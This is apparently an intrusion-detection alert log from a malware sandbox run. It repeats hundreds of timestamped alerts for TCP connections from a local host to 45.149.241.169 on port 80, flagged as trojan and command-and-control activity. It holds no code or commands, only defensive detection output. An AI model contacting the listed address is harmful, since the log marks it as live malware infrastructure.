                    2024-10-03T09:21:22.234810+020020243181Malware Command and Control Activity Detected192.168.2.116437345.149.241.16980TCP
                    2024-10-03T09:21:23.090242+020020243181Malware Command and Control Activity Detected192.168.2.116437445.149.241.16980TCP
                    2024-10-03T09:21:23.948484+020020243181Malware Command and Control Activity Detected192.168.2.116437545.149.241.16980TCP
                    2024-10-03T09:21:24.875611+020020243181Malware Command and Control Activity Detected192.168.2.116437645.149.241.16980TCP
                    2024-10-03T09:21:25.669335+020020243181Malware Command and Control Activity Detected192.168.2.116437845.149.241.16980TCP
                    2024-10-03T09:21:26.688958+020020243181Malware Command and Control Activity Detected192.168.2.116437945.149.241.16980TCP
                    2024-10-03T09:21:27.634586+020020243181Malware Command and Control Activity Detected192.168.2.116438045.149.241.16980TCP
                    2024-10-03T09:21:28.548334+020020243181Malware Command and Control Activity Detected192.168.2.116438145.149.241.16980TCP
                    2024-10-03T09:21:29.432337+020020243181Malware Command and Control Activity Detected192.168.2.116438245.149.241.16980TCP
                    2024-10-03T09:21:30.259881+020020243181Malware Command and Control Activity Detected192.168.2.116438345.149.241.16980TCP
                    2024-10-03T09:21:31.213756+020020243181Malware Command and Control Activity Detected192.168.2.116438445.149.241.16980TCP
                    2024-10-03T09:21:32.591622+020020243181Malware Command and Control Activity Detected192.168.2.116438545.149.241.16980TCP
                    2024-10-03T09:21:33.386243+020020243181Malware Command and Control Activity Detected192.168.2.116438645.149.241.16980TCP
                    2024-10-03T09:21:35.070962+020020243181Malware Command and Control Activity Detected192.168.2.116438745.149.241.16980TCP
                    2024-10-03T09:21:46.491936+020020243181Malware Command and Control Activity Detected192.168.2.116438845.149.241.16980TCP
                    2024-10-03T09:21:47.323870+020020243181Malware Command and Control Activity Detected192.168.2.116438945.149.241.16980TCP
                    2024-10-03T09:21:48.281112+020020243181Malware Command and Control Activity Detected192.168.2.116439045.149.241.16980TCP
                    2024-10-03T09:21:49.089316+020020243181Malware Command and Control Activity Detected192.168.2.116439145.149.241.16980TCP
                    2024-10-03T09:21:50.342573+020020243181Malware Command and Control Activity Detected192.168.2.116439245.149.241.16980TCP
                    2024-10-03T09:21:51.138044+020020243181Malware Command and Control Activity Detected192.168.2.116439345.149.241.16980TCP
                    2024-10-03T09:21:51.987281+020020243181Malware Command and Control Activity Detected192.168.2.116439445.149.241.16980TCP
                    2024-10-03T09:21:52.824432+020020243181Malware Command and Control Activity Detected192.168.2.116439545.149.241.16980TCP
                    2024-10-03T09:21:53.813148+020020243181Malware Command and Control Activity Detected192.168.2.116439645.149.241.16980TCP
                    2024-10-03T09:21:54.779943+020020243181Malware Command and Control Activity Detected192.168.2.116439745.149.241.16980TCP
                    2024-10-03T09:21:55.743930+020020243181Malware Command and Control Activity Detected192.168.2.116439845.149.241.16980TCP
                    2024-10-03T09:21:57.049613+020020243181Malware Command and Control Activity Detected192.168.2.116439945.149.241.16980TCP
                    2024-10-03T09:21:58.009483+020020243181Malware Command and Control Activity Detected192.168.2.116440045.149.241.16980TCP
                    2024-10-03T09:21:58.968924+020020243181Malware Command and Control Activity Detected192.168.2.116440145.149.241.16980TCP
                    2024-10-03T09:21:59.912717+020020243181Malware Command and Control Activity Detected192.168.2.116440245.149.241.16980TCP
                    2024-10-03T09:22:00.875995+020020243181Malware Command and Control Activity Detected192.168.2.116440345.149.241.16980TCP
                    2024-10-03T09:22:02.986735+020020243181Malware Command and Control Activity Detected192.168.2.116440445.149.241.16980TCP
                    2024-10-03T09:22:03.927136+020020243181Malware Command and Control Activity Detected192.168.2.116440545.149.241.16980TCP
                    2024-10-03T09:22:04.921954+020020243181Malware Command and Control Activity Detected192.168.2.116440645.149.241.16980TCP
                    2024-10-03T09:22:06.114484+020020243181Malware Command and Control Activity Detected192.168.2.116440745.149.241.16980TCP
                    2024-10-03T09:22:07.060441+020020243181Malware Command and Control Activity Detected192.168.2.116440845.149.241.16980TCP
                    2024-10-03T09:22:07.996431+020020243181Malware Command and Control Activity Detected192.168.2.116440945.149.241.16980TCP
                    2024-10-03T09:22:09.068231+020020243181Malware Command and Control Activity Detected192.168.2.116441045.149.241.16980TCP
                    2024-10-03T09:22:10.004080+020020243181Malware Command and Control Activity Detected192.168.2.116441145.149.241.16980TCP
                    2024-10-03T09:22:11.079290+020020243181Malware Command and Control Activity Detected192.168.2.116441245.149.241.16980TCP
                    2024-10-03T09:22:12.003792+020020243181Malware Command and Control Activity Detected192.168.2.116441345.149.241.16980TCP
                    2024-10-03T09:22:12.893575+020020243181Malware Command and Control Activity Detected192.168.2.116441445.149.241.16980TCP
                    2024-10-03T09:22:13.853371+020020243181Malware Command and Control Activity Detected192.168.2.116441545.149.241.16980TCP
                    2024-10-03T09:22:14.776328+020020243181Malware Command and Control Activity Detected192.168.2.116441645.149.241.16980TCP
                    2024-10-03T09:22:15.764134+020020243181Malware Command and Control Activity Detected192.168.2.116441745.149.241.16980TCP
                    2024-10-03T09:22:16.667875+020020243181Malware Command and Control Activity Detected192.168.2.116441845.149.241.16980TCP
                    2024-10-03T09:22:17.525911+020020243181Malware Command and Control Activity Detected192.168.2.116441945.149.241.16980TCP
                    2024-10-03T09:22:18.555021+020020243181Malware Command and Control Activity Detected192.168.2.116442045.149.241.16980TCP
                    2024-10-03T09:22:19.379297+020020243181Malware Command and Control Activity Detected192.168.2.116442145.149.241.16980TCP
                    2024-10-03T09:22:20.358626+020020243181Malware Command and Control Activity Detected192.168.2.116442245.149.241.16980TCP
                    2024-10-03T09:22:21.203422+020020243181Malware Command and Control Activity Detected192.168.2.116442345.149.241.16980TCP
                    2024-10-03T09:22:22.048862+020020243181Malware Command and Control Activity Detected192.168.2.116442445.149.241.16980TCP
                    2024-10-03T09:22:22.910892+020020243181Malware Command and Control Activity Detected192.168.2.116442545.149.241.16980TCP
                    2024-10-03T09:22:23.931318+020020243181Malware Command and Control Activity Detected192.168.2.116442645.149.241.16980TCP
                    2024-10-03T09:22:24.748653+020020243181Malware Command and Control Activity Detected192.168.2.116442745.149.241.16980TCP
                    2024-10-03T09:22:25.639024+020020243181Malware Command and Control Activity Detected192.168.2.116442845.149.241.16980TCP
                    2024-10-03T09:22:26.473248+020020243181Malware Command and Control Activity Detected192.168.2.116442945.149.241.16980TCP
                    2024-10-03T09:22:27.331889+020020243181Malware Command and Control Activity Detected192.168.2.116443045.149.241.16980TCP
                    2024-10-03T09:22:28.156424+020020243181Malware Command and Control Activity Detected192.168.2.116443145.149.241.16980TCP
                    2024-10-03T09:22:29.195837+020020243181Malware Command and Control Activity Detected192.168.2.116443245.149.241.16980TCP
                    2024-10-03T09:22:30.480234+020020243181Malware Command and Control Activity Detected192.168.2.116443345.149.241.16980TCP
                    2024-10-03T09:22:31.486447+020020243181Malware Command and Control Activity Detected192.168.2.116443445.149.241.16980TCP
                    2024-10-03T09:22:32.303507+020020243181Malware Command and Control Activity Detected192.168.2.116443545.149.241.16980TCP
                    2024-10-03T09:22:33.188157+020020243181Malware Command and Control Activity Detected192.168.2.116443645.149.241.16980TCP
                    2024-10-03T09:22:34.292855+020020243181Malware Command and Control Activity Detected192.168.2.116443745.149.241.16980TCP
                    2024-10-03T09:22:35.079411+020020243181Malware Command and Control Activity Detected192.168.2.116443845.149.241.16980TCP
                    2024-10-03T09:22:35.848697+020020243181Malware Command and Control Activity Detected192.168.2.116443945.149.241.16980TCP
                    2024-10-03T09:22:36.750157+020020243181Malware Command and Control Activity Detected192.168.2.116444045.149.241.16980TCP
                    2024-10-03T09:22:37.777548+020020243181Malware Command and Control Activity Detected192.168.2.116444145.149.241.16980TCP
                    2024-10-03T09:22:38.687921+020020243181Malware Command and Control Activity Detected192.168.2.116444245.149.241.16980TCP
                    2024-10-03T09:22:39.523859+020020243181Malware Command and Control Activity Detected192.168.2.116444345.149.241.16980TCP
                    2024-10-03T09:22:40.350489+020020243181Malware Command and Control Activity Detected192.168.2.116444445.149.241.16980TCP
                    2024-10-03T09:22:41.352352+020020243181Malware Command and Control Activity Detected192.168.2.116444545.149.241.16980TCP
                    2024-10-03T09:22:42.187830+020020243181Malware Command and Control Activity Detected192.168.2.116444645.149.241.16980TCP
                    2024-10-03T09:22:43.088359+020020243181Malware Command and Control Activity Detected192.168.2.116444745.149.241.16980TCP
                    2024-10-03T09:22:43.911035+020020243181Malware Command and Control Activity Detected192.168.2.116444845.149.241.16980TCP
                    2024-10-03T09:22:44.840138+020020243181Malware Command and Control Activity Detected192.168.2.116444945.149.241.16980TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-03T09:20:48.138102+020020216411A Network Trojan was detected192.168.2.114971145.149.241.16980TCP
                    2024-10-03T09:20:49.427132+020020216411A Network Trojan was detected192.168.2.114971245.149.241.16980TCP
                    2024-10-03T09:20:50.395968+020020216411A Network Trojan was detected192.168.2.114971345.149.241.16980TCP
                    2024-10-03T09:20:52.138116+020020216411A Network Trojan was detected192.168.2.114971445.149.241.16980TCP
                    2024-10-03T09:20:53.059614+020020216411A Network Trojan was detected192.168.2.114971545.149.241.16980TCP
                    2024-10-03T09:20:55.313220+020020216411A Network Trojan was detected192.168.2.114971745.149.241.16980TCP
                    2024-10-03T09:20:56.544536+020020216411A Network Trojan was detected192.168.2.114971845.149.241.16980TCP
                    2024-10-03T09:20:58.316168+020020216411A Network Trojan was detected192.168.2.115584345.149.241.16980TCP
                    2024-10-03T09:20:59.272737+020020216411A Network Trojan was detected192.168.2.116434845.149.241.16980TCP
                    2024-10-03T09:21:00.670903+020020216411A Network Trojan was detected192.168.2.116435045.149.241.16980TCP
                    2024-10-03T09:21:01.623467+020020216411A Network Trojan was detected192.168.2.116435245.149.241.16980TCP
                    2024-10-03T09:21:02.448704+020020216411A Network Trojan was detected192.168.2.116435445.149.241.16980TCP
                    2024-10-03T09:21:03.488048+020020216411A Network Trojan was detected192.168.2.116435545.149.241.16980TCP
                    2024-10-03T09:21:04.428362+020020216411A Network Trojan was detected192.168.2.116435745.149.241.16980TCP
                    2024-10-03T09:21:05.363793+020020216411A Network Trojan was detected192.168.2.116435845.149.241.16980TCP
                    2024-10-03T09:21:06.386274+020020216411A Network Trojan was detected192.168.2.116435945.149.241.16980TCP
                    2024-10-03T09:21:07.265208+020020216411A Network Trojan was detected192.168.2.116436045.149.241.16980TCP
                    2024-10-03T09:21:08.224949+020020216411A Network Trojan was detected192.168.2.116436145.149.241.16980TCP
                    2024-10-03T09:21:09.172629+020020216411A Network Trojan was detected192.168.2.116436245.149.241.16980TCP
                    2024-10-03T09:21:09.997521+020020216411A Network Trojan was detected192.168.2.116436345.149.241.16980TCP
                    2024-10-03T09:21:10.996788+020020216411A Network Trojan was detected192.168.2.116436445.149.241.16980TCP
                    2024-10-03T09:21:12.112321+020020216411A Network Trojan was detected192.168.2.116436545.149.241.16980TCP
                    2024-10-03T09:21:13.055508+020020216411A Network Trojan was detected192.168.2.116436645.149.241.16980TCP
                    2024-10-03T09:21:13.916854+020020216411A Network Trojan was detected192.168.2.116436745.149.241.16980TCP
                    2024-10-03T09:21:14.881238+020020216411A Network Trojan was detected192.168.2.116436845.149.241.16980TCP
                    2024-10-03T09:21:16.059969+020020216411A Network Trojan was detected192.168.2.116436945.149.241.16980TCP
                    2024-10-03T09:21:17.083633+020020216411A Network Trojan was detected192.168.2.116437045.149.241.16980TCP
                    2024-10-03T09:21:18.023488+020020216411A Network Trojan was detected192.168.2.116437145.149.241.16980TCP
                    2024-10-03T09:21:19.175709+020020216411A Network Trojan was detected192.168.2.116437245.149.241.16980TCP
                    2024-10-03T09:21:21.592824+020020216411A Network Trojan was detected192.168.2.116437345.149.241.16980TCP
                    2024-10-03T09:21:22.386915+020020216411A Network Trojan was detected192.168.2.116437445.149.241.16980TCP
                    2024-10-03T09:21:23.246842+020020216411A Network Trojan was detected192.168.2.116437545.149.241.16980TCP
                    2024-10-03T09:21:24.104473+020020216411A Network Trojan was detected192.168.2.116437645.149.241.16980TCP
                    2024-10-03T09:21:25.029228+020020216411A Network Trojan was detected192.168.2.116437845.149.241.16980TCP
                    2024-10-03T09:21:25.820375+020020216411A Network Trojan was detected192.168.2.116437945.149.241.16980TCP
                    2024-10-03T09:21:26.851586+020020216411A Network Trojan was detected192.168.2.116438045.149.241.16980TCP
                    2024-10-03T09:21:27.810227+020020216411A Network Trojan was detected192.168.2.116438145.149.241.16980TCP
                    2024-10-03T09:21:28.697925+020020216411A Network Trojan was detected192.168.2.116438245.149.241.16980TCP
                    2024-10-03T09:21:29.591807+020020216411A Network Trojan was detected192.168.2.116438345.149.241.16980TCP
                    2024-10-03T09:21:30.413511+020020216411A Network Trojan was detected192.168.2.116438445.149.241.16980TCP
                    2024-10-03T09:21:31.498785+020020216411A Network Trojan was detected192.168.2.116438545.149.241.16980TCP
                    2024-10-03T09:21:32.743030+020020216411A Network Trojan was detected192.168.2.116438645.149.241.16980TCP
                    2024-10-03T09:21:33.556187+020020216411A Network Trojan was detected192.168.2.116438745.149.241.16980TCP
                    2024-10-03T09:21:35.239657+020020216411A Network Trojan was detected192.168.2.116438845.149.241.16980TCP
                    2024-10-03T09:21:46.647501+020020216411A Network Trojan was detected192.168.2.116438945.149.241.16980TCP
                    2024-10-03T09:21:47.487101+020020216411A Network Trojan was detected192.168.2.116439045.149.241.16980TCP
                    2024-10-03T09:21:48.440836+020020216411A Network Trojan was detected192.168.2.116439145.149.241.16980TCP
                    2024-10-03T09:21:49.258711+020020216411A Network Trojan was detected192.168.2.116439245.149.241.16980TCP
                    2024-10-03T09:21:50.499694+020020216411A Network Trojan was detected192.168.2.116439345.149.241.16980TCP
                    2024-10-03T09:21:51.287566+020020216411A Network Trojan was detected192.168.2.116439445.149.241.16980TCP
                    2024-10-03T09:21:52.148748+020020216411A Network Trojan was detected192.168.2.116439545.149.241.16980TCP
                    2024-10-03T09:21:52.981934+020020216411A Network Trojan was detected192.168.2.116439645.149.241.16980TCP
                    2024-10-03T09:21:54.007169+020020216411A Network Trojan was detected192.168.2.116439745.149.241.16980TCP
                    2024-10-03T09:21:54.945256+020020216411A Network Trojan was detected192.168.2.116439845.149.241.16980TCP
                    2024-10-03T09:21:55.920209+020020216411A Network Trojan was detected192.168.2.116439945.149.241.16980TCP
                    2024-10-03T09:21:57.220850+020020216411A Network Trojan was detected192.168.2.116440045.149.241.16980TCP
                    2024-10-03T09:21:58.171912+020020216411A Network Trojan was detected192.168.2.116440145.149.241.16980TCP
                    2024-10-03T09:21:59.151255+020020216411A Network Trojan was detected192.168.2.116440245.149.241.16980TCP
                    2024-10-03T09:22:00.075267+020020216411A Network Trojan was detected192.168.2.116440345.149.241.16980TCP
                    2024-10-03T09:22:01.051486+020020216411A Network Trojan was detected192.168.2.116440445.149.241.16980TCP
                    2024-10-03T09:22:03.157629+020020216411A Network Trojan was detected192.168.2.116440545.149.241.16980TCP
                    2024-10-03T09:22:04.115545+020020216411A Network Trojan was detected192.168.2.116440645.149.241.16980TCP
                    2024-10-03T09:22:05.338912+020020216411A Network Trojan was detected192.168.2.116440745.149.241.16980TCP
                    2024-10-03T09:22:06.283716+020020216411A Network Trojan was detected192.168.2.116440845.149.241.16980TCP
                    2024-10-03T09:22:07.225458+020020216411A Network Trojan was detected192.168.2.116440945.149.241.16980TCP
                    2024-10-03T09:22:08.313595+020020216411A Network Trojan was detected192.168.2.116441045.149.241.16980TCP
                    2024-10-03T09:22:09.230403+020020216411A Network Trojan was detected192.168.2.116441145.149.241.16980TCP
                    2024-10-03T09:22:10.331436+020020216411A Network Trojan was detected192.168.2.116441245.149.241.16980TCP
                    2024-10-03T09:22:11.239806+020020216411A Network Trojan was detected192.168.2.116441345.149.241.16980TCP
                    2024-10-03T09:22:12.172123+020020216411A Network Trojan was detected192.168.2.116441445.149.241.16980TCP
                    2024-10-03T09:22:13.068985+020020216411A Network Trojan was detected192.168.2.116441545.149.241.16980TCP
                    2024-10-03T09:22:14.008975+020020216411A Network Trojan was detected192.168.2.116441645.149.241.16980TCP
                    2024-10-03T09:22:14.936067+020020216411A Network Trojan was detected192.168.2.116441745.149.241.16980TCP
                    2024-10-03T09:22:15.929179+020020216411A Network Trojan was detected192.168.2.116441845.149.241.16980TCP
                    2024-10-03T09:22:16.827330+020020216411A Network Trojan was detected192.168.2.116441945.149.241.16980TCP
                    2024-10-03T09:22:17.703674+020020216411A Network Trojan was detected192.168.2.116442045.149.241.16980TCP
                    2024-10-03T09:22:18.714301+020020216411A Network Trojan was detected192.168.2.116442145.149.241.16980TCP
                    2024-10-03T09:22:19.547744+020020216411A Network Trojan was detected192.168.2.116442245.149.241.16980TCP
                    2024-10-03T09:22:20.566222+020020216411A Network Trojan was detected192.168.2.116442345.149.241.16980TCP
                    2024-10-03T09:22:21.356699+020020216411A Network Trojan was detected192.168.2.116442445.149.241.16980TCP
                    2024-10-03T09:22:22.220181+020020216411A Network Trojan was detected192.168.2.116442545.149.241.16980TCP
                    2024-10-03T09:22:23.369318+020020216411A Network Trojan was detected192.168.2.116442645.149.241.16980TCP
                    2024-10-03T09:22:24.106031+020020216411A Network Trojan was detected192.168.2.116442745.149.241.16980TCP
                    2024-10-03T09:22:24.910667+020020216411A Network Trojan was detected192.168.2.116442845.149.241.16980TCP
                    2024-10-03T09:22:25.816016+020020216411A Network Trojan was detected192.168.2.116442945.149.241.16980TCP
                    2024-10-03T09:22:26.659850+020020216411A Network Trojan was detected192.168.2.116443045.149.241.16980TCP
                    2024-10-03T09:22:27.504132+020020216411A Network Trojan was detected192.168.2.116443145.149.241.16980TCP
                    2024-10-03T09:22:28.311778+020020216411A Network Trojan was detected192.168.2.116443245.149.241.16980TCP
                    2024-10-03T09:22:29.639445+020020216411A Network Trojan was detected192.168.2.116443345.149.241.16980TCP
                    2024-10-03T09:22:30.646052+020020216411A Network Trojan was detected192.168.2.116443445.149.241.16980TCP
                    2024-10-03T09:22:31.674682+020020216411A Network Trojan was detected192.168.2.116443545.149.241.16980TCP
                    2024-10-03T09:22:32.502916+020020216411A Network Trojan was detected192.168.2.116443645.149.241.16980TCP
                    2024-10-03T09:22:33.340490+020020216411A Network Trojan was detected192.168.2.116443745.149.241.16980TCP
                    2024-10-03T09:22:34.448158+020020216411A Network Trojan was detected192.168.2.116443845.149.241.16980TCP
                    2024-10-03T09:22:35.225001+020020216411A Network Trojan was detected192.168.2.116443945.149.241.16980TCP
                    2024-10-03T09:22:36.015476+020020216411A Network Trojan was detected192.168.2.116444045.149.241.16980TCP
                    2024-10-03T09:22:36.917140+020020216411A Network Trojan was detected192.168.2.116444145.149.241.16980TCP
                    2024-10-03T09:22:37.931400+020020216411A Network Trojan was detected192.168.2.116444245.149.241.16980TCP
                    2024-10-03T09:22:38.836712+020020216411A Network Trojan was detected192.168.2.116444345.149.241.16980TCP
                    2024-10-03T09:22:39.681925+020020216411A Network Trojan was detected192.168.2.116444445.149.241.16980TCP
                    2024-10-03T09:22:40.614660+020020216411A Network Trojan was detected192.168.2.116444545.149.241.16980TCP
                    2024-10-03T09:22:41.558183+020020216411A Network Trojan was detected192.168.2.116444645.149.241.16980TCP
                    2024-10-03T09:22:42.344416+020020216411A Network Trojan was detected192.168.2.116444745.149.241.16980TCP
                    2024-10-03T09:22:43.251789+020020216411A Network Trojan was detected192.168.2.116444845.149.241.16980TCP
                    2024-10-03T09:22:44.067474+020020216411A Network Trojan was detected192.168.2.116444945.149.241.16980TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-03T09:20:48.138102+020028257661Malware Command and Control Activity Detected192.168.2.114971145.149.241.16980TCP
                    2024-10-03T09:20:49.427132+020028257661Malware Command and Control Activity Detected192.168.2.114971245.149.241.16980TCP
                    2024-10-03T09:20:50.395968+020028257661Malware Command and Control Activity Detected192.168.2.114971345.149.241.16980TCP
                    2024-10-03T09:20:52.138116+020028257661Malware Command and Control Activity Detected192.168.2.114971445.149.241.16980TCP
                    2024-10-03T09:20:53.059614+020028257661Malware Command and Control Activity Detected192.168.2.114971545.149.241.16980TCP
                    2024-10-03T09:20:55.313220+020028257661Malware Command and Control Activity Detected192.168.2.114971745.149.241.16980TCP
                    2024-10-03T09:20:56.544536+020028257661Malware Command and Control Activity Detected192.168.2.114971845.149.241.16980TCP
                    2024-10-03T09:20:58.316168+020028257661Malware Command and Control Activity Detected192.168.2.115584345.149.241.16980TCP
                    2024-10-03T09:20:59.272737+020028257661Malware Command and Control Activity Detected192.168.2.116434845.149.241.16980TCP
                    2024-10-03T09:21:00.670903+020028257661Malware Command and Control Activity Detected192.168.2.116435045.149.241.16980TCP
                    2024-10-03T09:21:01.623467+020028257661Malware Command and Control Activity Detected192.168.2.116435245.149.241.16980TCP
                    2024-10-03T09:21:02.448704+020028257661Malware Command and Control Activity Detected192.168.2.116435445.149.241.16980TCP
                    2024-10-03T09:21:03.488048+020028257661Malware Command and Control Activity Detected192.168.2.116435545.149.241.16980TCP
                    2024-10-03T09:21:04.428362+020028257661Malware Command and Control Activity Detected192.168.2.116435745.149.241.16980TCP
                    2024-10-03T09:21:05.363793+020028257661Malware Command and Control Activity Detected192.168.2.116435845.149.241.16980TCP
                    2024-10-03T09:21:06.386274+020028257661Malware Command and Control Activity Detected192.168.2.116435945.149.241.16980TCP
                    2024-10-03T09:21:07.265208+020028257661Malware Command and Control Activity Detected192.168.2.116436045.149.241.16980TCP
                    2024-10-03T09:21:08.224949+020028257661Malware Command and Control Activity Detected192.168.2.116436145.149.241.16980TCP
                    2024-10-03T09:21:09.172629+020028257661Malware Command and Control Activity Detected192.168.2.116436245.149.241.16980TCP
                    2024-10-03T09:21:09.997521+020028257661Malware Command and Control Activity Detected192.168.2.116436345.149.241.16980TCP
                    2024-10-03T09:21:10.996788+020028257661Malware Command and Control Activity Detected192.168.2.116436445.149.241.16980TCP
                    2024-10-03T09:21:12.112321+020028257661Malware Command and Control Activity Detected192.168.2.116436545.149.241.16980TCP
                    2024-10-03T09:21:13.055508+020028257661Malware Command and Control Activity Detected192.168.2.116436645.149.241.16980TCP
                    2024-10-03T09:21:13.916854+020028257661Malware Command and Control Activity Detected192.168.2.116436745.149.241.16980TCP
                    2024-10-03T09:21:14.881238+020028257661Malware Command and Control Activity Detected192.168.2.116436845.149.241.16980TCP
                    2024-10-03T09:21:16.059969+020028257661Malware Command and Control Activity Detected192.168.2.116436945.149.241.16980TCP
                    2024-10-03T09:21:17.083633+020028257661Malware Command and Control Activity Detected192.168.2.116437045.149.241.16980TCP
                    2024-10-03T09:21:18.023488+020028257661Malware Command and Control Activity Detected192.168.2.116437145.149.241.16980TCP
                    2024-10-03T09:21:19.175709+020028257661Malware Command and Control Activity Detected192.168.2.116437245.149.241.16980TCP
                    2024-10-03T09:21:21.592824+020028257661Malware Command and Control Activity Detected192.168.2.116437345.149.241.16980TCP
                    2024-10-03T09:21:22.386915+020028257661Malware Command and Control Activity Detected192.168.2.116437445.149.241.16980TCP
                    2024-10-03T09:21:23.246842+020028257661Malware Command and Control Activity Detected192.168.2.116437545.149.241.16980TCP
                    2024-10-03T09:21:24.104473+020028257661Malware Command and Control Activity Detected192.168.2.116437645.149.241.16980TCP
                    2024-10-03T09:21:25.029228+020028257661Malware Command and Control Activity Detected192.168.2.116437845.149.241.16980TCP
                    2024-10-03T09:21:25.820375+020028257661Malware Command and Control Activity Detected192.168.2.116437945.149.241.16980TCP
                    2024-10-03T09:21:26.851586+020028257661Malware Command and Control Activity Detected192.168.2.116438045.149.241.16980TCP
                    2024-10-03T09:21:27.810227+020028257661Malware Command and Control Activity Detected192.168.2.116438145.149.241.16980TCP
                    2024-10-03T09:21:28.697925+020028257661Malware Command and Control Activity Detected192.168.2.116438245.149.241.16980TCP
                    2024-10-03T09:21:29.591807+020028257661Malware Command and Control Activity Detected192.168.2.116438345.149.241.16980TCP
                    2024-10-03T09:21:30.413511+020028257661Malware Command and Control Activity Detected192.168.2.116438445.149.241.16980TCP
                    2024-10-03T09:21:31.498785+020028257661Malware Command and Control Activity Detected192.168.2.116438545.149.241.16980TCP
                    2024-10-03T09:21:32.743030+020028257661Malware Command and Control Activity Detected192.168.2.116438645.149.241.16980TCP
                    2024-10-03T09:21:33.556187+020028257661Malware Command and Control Activity Detected192.168.2.116438745.149.241.16980TCP
                    2024-10-03T09:21:35.239657+020028257661Malware Command and Control Activity Detected192.168.2.116438845.149.241.16980TCP
                    2024-10-03T09:21:46.647501+020028257661Malware Command and Control Activity Detected192.168.2.116438945.149.241.16980TCP
                    2024-10-03T09:21:47.487101+020028257661Malware Command and Control Activity Detected192.168.2.116439045.149.241.16980TCP
                    2024-10-03T09:21:48.440836+020028257661Malware Command and Control Activity Detected192.168.2.116439145.149.241.16980TCP
                    2024-10-03T09:21:49.258711+020028257661Malware Command and Control Activity Detected192.168.2.116439245.149.241.16980TCP
                    2024-10-03T09:21:50.499694+020028257661Malware Command and Control Activity Detected192.168.2.116439345.149.241.16980TCP
                    2024-10-03T09:21:51.287566+020028257661Malware Command and Control Activity Detected192.168.2.116439445.149.241.16980TCP
                    2024-10-03T09:21:52.148748+020028257661Malware Command and Control Activity Detected192.168.2.116439545.149.241.16980TCP
                    2024-10-03T09:21:52.981934+020028257661Malware Command and Control Activity Detected192.168.2.116439645.149.241.16980TCP
                    2024-10-03T09:21:54.007169+020028257661Malware Command and Control Activity Detected192.168.2.116439745.149.241.16980TCP
                    2024-10-03T09:21:54.945256+020028257661Malware Command and Control Activity Detected192.168.2.116439845.149.241.16980TCP
                    2024-10-03T09:21:55.920209+020028257661Malware Command and Control Activity Detected192.168.2.116439945.149.241.16980TCP
                    2024-10-03T09:21:57.220850+020028257661Malware Command and Control Activity Detected192.168.2.116440045.149.241.16980TCP
                    2024-10-03T09:21:58.171912+020028257661Malware Command and Control Activity Detected192.168.2.116440145.149.241.16980TCP
                    2024-10-03T09:21:59.151255+020028257661Malware Command and Control Activity Detected192.168.2.116440245.149.241.16980TCP
                    2024-10-03T09:22:00.075267+020028257661Malware Command and Control Activity Detected192.168.2.116440345.149.241.16980TCP
                    2024-10-03T09:22:01.051486+020028257661Malware Command and Control Activity Detected192.168.2.116440445.149.241.16980TCP
                    2024-10-03T09:22:03.157629+020028257661Malware Command and Control Activity Detected192.168.2.116440545.149.241.16980TCP
                    2024-10-03T09:22:04.115545+020028257661Malware Command and Control Activity Detected192.168.2.116440645.149.241.16980TCP
                    2024-10-03T09:22:05.338912+020028257661Malware Command and Control Activity Detected192.168.2.116440745.149.241.16980TCP
                    2024-10-03T09:22:06.283716+020028257661Malware Command and Control Activity Detected192.168.2.116440845.149.241.16980TCP
                    2024-10-03T09:22:07.225458+020028257661Malware Command and Control Activity Detected192.168.2.116440945.149.241.16980TCP
                    2024-10-03T09:22:08.313595+020028257661Malware Command and Control Activity Detected192.168.2.116441045.149.241.16980TCP
                    2024-10-03T09:22:09.230403+020028257661Malware Command and Control Activity Detected192.168.2.116441145.149.241.16980TCP
                    2024-10-03T09:22:10.331436+020028257661Malware Command and Control Activity Detected192.168.2.116441245.149.241.16980TCP
                    2024-10-03T09:22:11.239806+020028257661Malware Command and Control Activity Detected192.168.2.116441345.149.241.16980TCP
                    2024-10-03T09:22:12.172123+020028257661Malware Command and Control Activity Detected192.168.2.116441445.149.241.16980TCP
                    2024-10-03T09:22:13.068985+020028257661Malware Command and Control Activity Detected192.168.2.116441545.149.241.16980TCP
                    2024-10-03T09:22:14.008975+020028257661Malware Command and Control Activity Detected192.168.2.116441645.149.241.16980TCP
                    2024-10-03T09:22:14.936067+020028257661Malware Command and Control Activity Detected192.168.2.116441745.149.241.16980TCP
                    2024-10-03T09:22:15.929179+020028257661Malware Command and Control Activity Detected192.168.2.116441845.149.241.16980TCP
                    2024-10-03T09:22:16.827330+020028257661Malware Command and Control Activity Detected192.168.2.116441945.149.241.16980TCP
                    2024-10-03T09:22:17.703674+020028257661Malware Command and Control Activity Detected192.168.2.116442045.149.241.16980TCP
                    2024-10-03T09:22:18.714301+020028257661Malware Command and Control Activity Detected192.168.2.116442145.149.241.16980TCP
                    2024-10-03T09:22:19.547744+020028257661Malware Command and Control Activity Detected192.168.2.116442245.149.241.16980TCP
                    2024-10-03T09:22:20.566222+020028257661Malware Command and Control Activity Detected192.168.2.116442345.149.241.16980TCP
                    2024-10-03T09:22:21.356699+020028257661Malware Command and Control Activity Detected192.168.2.116442445.149.241.16980TCP
                    2024-10-03T09:22:22.220181+020028257661Malware Command and Control Activity Detected192.168.2.116442545.149.241.16980TCP
                    2024-10-03T09:22:23.369318+020028257661Malware Command and Control Activity Detected192.168.2.116442645.149.241.16980TCP
                    2024-10-03T09:22:24.106031+020028257661Malware Command and Control Activity Detected192.168.2.116442745.149.241.16980TCP
                    2024-10-03T09:22:24.910667+020028257661Malware Command and Control Activity Detected192.168.2.116442845.149.241.16980TCP
                    2024-10-03T09:22:25.816016+020028257661Malware Command and Control Activity Detected192.168.2.116442945.149.241.16980TCP
                    2024-10-03T09:22:26.659850+020028257661Malware Command and Control Activity Detected192.168.2.116443045.149.241.16980TCP
                    2024-10-03T09:22:27.504132+020028257661Malware Command and Control Activity Detected192.168.2.116443145.149.241.16980TCP
                    2024-10-03T09:22:28.311778+020028257661Malware Command and Control Activity Detected192.168.2.116443245.149.241.16980TCP
                    2024-10-03T09:22:29.639445+020028257661Malware Command and Control Activity Detected192.168.2.116443345.149.241.16980TCP
                    2024-10-03T09:22:30.646052+020028257661Malware Command and Control Activity Detected192.168.2.116443445.149.241.16980TCP
                    2024-10-03T09:22:31.674682+020028257661Malware Command and Control Activity Detected192.168.2.116443545.149.241.16980TCP
                    2024-10-03T09:22:32.502916+020028257661Malware Command and Control Activity Detected192.168.2.116443645.149.241.16980TCP
